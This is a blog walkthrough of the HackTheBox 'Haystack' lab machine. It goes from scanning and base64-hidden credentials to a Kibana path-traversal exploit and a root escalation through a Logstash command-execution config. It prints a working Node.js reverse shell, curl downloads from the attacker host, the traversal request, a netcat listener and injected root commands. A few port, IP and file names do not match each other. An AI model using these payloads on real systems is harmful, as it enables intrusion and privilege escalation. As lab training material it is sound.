Home HackTheBox: Haystack
Post
Cancel

HackTheBox: Haystack

The first step. As is almost always the case is to run an Nmap scan on the host to discover which services are running:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@kali:~/Documents/haystack# nmap -A -oN scan 10.10.10.115
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 17:23 UTC
Nmap scan report for 10.10.10.115
Host is up (0.017s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods: 
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (92%), Linux 3.10 - 4.11 (90%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   16.13 ms 10.10.12.1
2   17.06 ms ip-10-10-10-115.eu-west-2.compute.internal (10.10.10.115)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds

From the output we can see that SSH is running on 22, and nginx webservers on 80 and 9200. when you browse to the page on port 80 you are greeted with a large image on a needle in a haystack. I downloaded this image and ran strings on the file.

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~/Downloads/haystack# strings needle.jpg
O'bu
N{M3
:t6Q6
STW5
*Oo!;.o|?>
.n2FrZ
rrNMz
#=pMr
BN2I
,'*'
I$f2/<-iy
bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==

At the bottom of the strings output you can see a long string which appears to be encoded with base64.

1
2
root@kali:~/Downloads/haystack# echo 'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' | base64 -d
la aguja en el pajar es "clave"

I then decided to browse to port 9200 on http://10.10.10.115:9200. It returned some JSON formatted data which indicates that it is hosting an elasticsearch database:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
  "name" : "iQEYHgS",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "pjrX7V_gSFmJY-DxP4tCQg",
  "version" : {
    "number" : "6.4.2",
    "build_flavor" : "default",
    "build_type" : "rpm",
    "build_hash" : "04711c2",
    "build_date" : "2018-09-26T13:34:09.098244Z",
    "build_snapshot" : false,
    "lucene_version" : "7.4.0",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

I then browsed to http://10.10.10.115:9200/_aliases to view the indices which are being used:

1
{".kibana":{"aliases":{}},"bank":{"aliases":{}},"quotes":{"aliases":{}}}

As you can see from the output, there are 3 indices. Kibana, Bank and quotes.

Now the next step I performed in quite a messy way. There is probably a much cleaner way of doing it. I knew from the decoded base 64 string from the image that the word of interest in ‘clave’. And so i browsed to each indices in turn and CTRL+F and searched the word clave. I have 2 results in the quotes index, both with additional base 64 strings:

1
2
{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}
{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}

I then decoded these strings using the same method as before.

1
2
3
4
root@kali:~/Downloads/haystack# echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d
pass: spanish.is.key
root@kali:~/Downloads/haystack# echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d
user: security

So we now have some login credentials which allow you to access the machine via SSH. From the indices we can see that Kibana is very likely installed. Once logged in via SSH i checked out the kibana config file to see how it has been setup.

1
2
3
4
5
6
7
8
9
10
11
root@kali:~/Downloads/haystack# ssh security@10.10.10.115
security@10.10.10.115's password: 
Last login: Tue Aug  6 15:52:37 2019 from 10.10.14.39
[security@haystack ~]$ cat /etc/kibana/kibana.yml 
# Kibana is served by a back end server. This setting specifies the port to use.
server.port: 5601

# Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
# The default is 'localhost', which usually means remote machines will not be able to connect.
# To allow connections from remote users, set this parameter to a non-loopback address.
server.host: "127.0.0.1"

We can see that it is running on port 5601 but it is only bound to the localhost, and isn’t accessible remotely. After a bit of googling i found an LFI vulnerability in this version of Kibana that we can use to escalate privileges.

The first stage in executing the vulnerability is to upload a javascript shell that can be executed by kibana. i hosted the following javascript file on my kali machine via pythons SimpleHTTPServer. Of course making sure to change the IP address to match my openVPN IP.

1
2
3
4
5
6
7
8
9
10
11
12
EnlighterJSRAW" data-enlighter-language="js">(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

I then downloaded the file to the haystack machine using curl.

1
2
[security@haystack ~]$ cd /tmp
[security@haystack tmp]$  curl http://10.10.13.111:8000/test.js --output jim.js

The next step is to start a netcat listener on the Kali machine which received the traffic generated by the reverse shell once it is run. This listener needs to run on port 1337 as stated in the JavaScript file.

1
2
root@kali:~/Downloads# nc -lvp 1337 
listening on [any] 2601 ...

I then send the GET request to kibana as described in the LFI vulnerability page on GitHub. I did this using curl. The request has to be from the localhost as kibana is only accessible locally.

1
[security@haystack tmp]$ curl -X GET 'http://127.0.0.1:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/jim.js'

Then looking at the listener we can see that the connection has been made. Typing ls lists the currently directory successfully.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~/Downloads# nc -lvp 1337
listening on [any] 2601 ...
10.10.10.111: inverse host lookup failed: Unknown host
connect to [10.10.13.111] from (UNKNOWN) [10.10.10.115] 56236
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

I upgraded to a more user friendly bash shell using python. You can also see from the whoami that we are now accessing the machine as the kibana user:

1
2
3
4
5
python -c 'import pty; pty.spawn("/bin/bash")' 

bash-4.2$ whoami
whoami
kibana

We now need to find a process that can be abused in some way to allow privilege escalation to root. By running ps aux we can see all running processes. It is apparat from this that logstash is running as root.

1
2
[security@haystack ~]$ ps aux | grep logstash
root       6147 22.4  7.5 2658288 293184 ?      SNsl 16:18   0:33 /bin/java -Xms500m -Xmx500m -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -Djava.awt.headless=true -Dfile.encoding=UTF-8 -Djruby.compile.invokedynamic=true -Djruby.jit.threshold=0 -XX:+HeapDumpOnOutOfMemoryError -Djava.security.egd=file:/dev/urandom -cp /usr/share/logstash/logstash-core/lib/jars/animal-sniffer-annotations-1.14.jar:/usr/share/logstash/logstash-core/lib/jars/commons-codec-1.11.jar:/usr/share/logstash/logstash-core/lib/jars/commons-compiler-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/error_prone_annotations-2.0.18.jar:/usr/share/logstash/logstash-core/lib/jars/google-java-format-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/gradle-license-report-0.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/guava-22.0.jar:/usr/share/logstash/logstash-core/lib/jars/j2objc-annotations-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-annotations-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-core-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-databind-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-dataformat-cbor-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/janino-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/jruby-complete-9.1.13.0.jar:/usr/share/logstash/logstash-core/lib/jars/jsr305-1.3.9.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-api-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-core-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-slf4j-impl-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/logstash-core.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.commands-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.contenttype-3.4.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.expressions-3.4.300.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.filesystem-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.jobs-3.5.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.resources-3.7.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.runtime-3.7.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.app-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.common-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.preferences-3.4.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.registry-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.jdt.core-3.10.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.osgi-3.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.text-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/slf4j-api-1.7.25.jar org.logstash.Logstash --path.settings /etc/logstash

I took a look at the logstash configuration:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
bash-4.2$ cd /etc/logstash/conf.d/
bash-4.2$ ls
ls
filter.conf  input.conf  output.conf
bash-4.2$ cat output.conf
cat output.conf 
output {
  if [type] == "execute" {
    stdout { codec => json }
    exec {
      command => "%{comando} &"
    }
  }
}
bash-4.2$ cat input.conf 
cat input.conf 
input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}
bash-4.2$ cat filter.conf 
cat filter.conf 
filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}
bash-4.2$

You can see that logstash is configured with 3 files. Input, output and filter.

Input.conf shows that it gathers data from /opt/kibana/logstash_*. This is checked every 10 seconds.

Filter.conf then shows that it is then filtered for messages matching the Ejecutar comando:

output.conf then shows that the command in the dynamic string comando is executed.

With this information we now know that we need to provided data in /opt/kibana/logstash_* which includes a command we want to run. This command will be executed by logstash, which in turn is running as root.

Logstash is very new to me. I wasn’t completely sure of the format that needed to be used in the logfile for a command to be captured by the filter an executed. Because of this i went for the spray a pray technique where i loaded the file with an assortment of possible formats which would be executed line by line until one works. The file can be seen here:

1
2
3
4
5
comando: cat /root/root.txt > /tmp/good
cat /root/root.txt > /tmp/good2
Ejecutar comando: cat /root/root.txt > /tmp/good3
GREEDYDATA:whoami > cat /root/root.txt > /tmp/good4
Ejecutar\s*comando\s*: cat /root/root.txt > /tmp/good5

I hosted this file on my Kali machine through python SimpleHTTPServer and downloaded it to the haystack machine into the /opt/kibana directory.

1
2
3
4
5
6
bash-4.2$ cd /opt/kibana/

curl 10.10.14.27:8000/logstash_i --output logstash_i
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   180  100   180    0     0   2964      0 --:--:-- --:--:-- --:--:--  2950

I waited the 10 seconds as configured in the input.conf for the file to be processed. I then checked the /tmp directory to see if my file had been created.

1
2
bash-4.2$ ls /tmp
good3

As you can see the good3 file has been outputted to /tmp. I did try recreating the logstash_j file with just the line which executed. But for some reason it didn’t work. Im still not 100% sure what the format should be. All i know is what i used worked, even though it is a bit messy. I then run cat on the file to view the flag and complete the machine.

1
2
bash-4.2$ cat /tmp/good
[REDACTED]
This post is licensed under CC BY 4.0 by the author.